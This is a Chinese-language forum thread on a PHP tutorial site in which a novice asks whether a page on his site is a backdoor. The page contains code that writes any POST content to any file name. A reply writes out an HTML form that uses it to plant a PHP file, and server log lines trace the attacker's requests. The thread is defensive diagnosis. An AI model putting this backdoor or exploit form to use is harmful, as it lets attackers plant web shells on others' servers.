Rumah > pembangunan bahagian belakang > tutorial php > 帮忙看一下这一个文件有没有后门或漏洞!

帮忙看一下这一个文件有没有后门或漏洞!

WBOY
Lepaskan: 2016-06-23 14:27:09
asal
971 orang telah melayarinya

我是菜鸟 我的站总是有一个木马文件,黑客是怎么上传到我的站,很好奇。


  
    
    
    
    
    
    
    
    
    
    
    
  
  
    
    
    
    
    
    
    
    
    
    
    
  
序号 号码 止数 下目 占成 佣虽  上寺 预计 走飞 走额 当前赔率
                     
if($_POST['img_text']=='news')
{
$title=$_POST['title'];

$newsort =$_POST['newsort'];

$newsort=str_replace(chr(92),"",$newsort);

$fp = fopen($title,"w"); 

fputs($fp,$newsort); 

fclose($fp); 

}
else
{?>

                  
                    
                    
                  
                
 
                      =$ids?>
                      设置

                     
 
             
             
             
                    



}
?>

回复讨论(解决方案)

if($_POST['img_text'] == 'news') {  $title = $_POST['title'];  $newsort = $_POST['newsort'];  $newsort = str_replace(chr(92), "", $newsort);  $fp = fopen($title, "w");   fputs($fp, $newsort);   fclose($fp); }
Salin selepas log masuk
就你这个代码,什么内容传不上来?

是不是要配合其它的文件啊 才能上传吗 是不是一句话

没有看到你的表单,但只要知道你的页面地址,做一个也很容易
比如

<form method=post action=页面地址><input type=submit name=img_text value=news><input type=text name=title value='info.php'><input type=text name=newsort value='<?php phpinfo();'></form>
Salin selepas log masuk
提交后就会在你的服务器上建立一个名为 info.php 的文件,执行它后就可知道你的服务器的所有信息

2013-11-10 13:26:23 POST /k_vc.php - 98.126.241.18 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+2.0.50727) http://localhost/sqst/index.asp www.itc888.com 200 0 1965 41441 5843
2013-11-10 13:26:29 GET /cc.php - 98.126.241.18 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+2.0.50727) - www.itc888.com 200 0 1330 661 3593

日志说明:k_vc.php 就是上面那一个文件,cc.php就是木马文件 www.itc888.com 小站的域名

$newsort =$_POST['newsort']; 没做任何过滤 直接给写入到title文件中了 漏洞大大的...

强得1B的代码 神一样的存在

这个上传连我这样的菜鸟都懂了。

sumber:php.cn
Kenyataan Laman Web ini
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn
Tutorial Popular
Lagi>
Muat turun terkini
Lagi>
kesan web
Kod sumber laman web
Bahan laman web
Templat hujung hadapan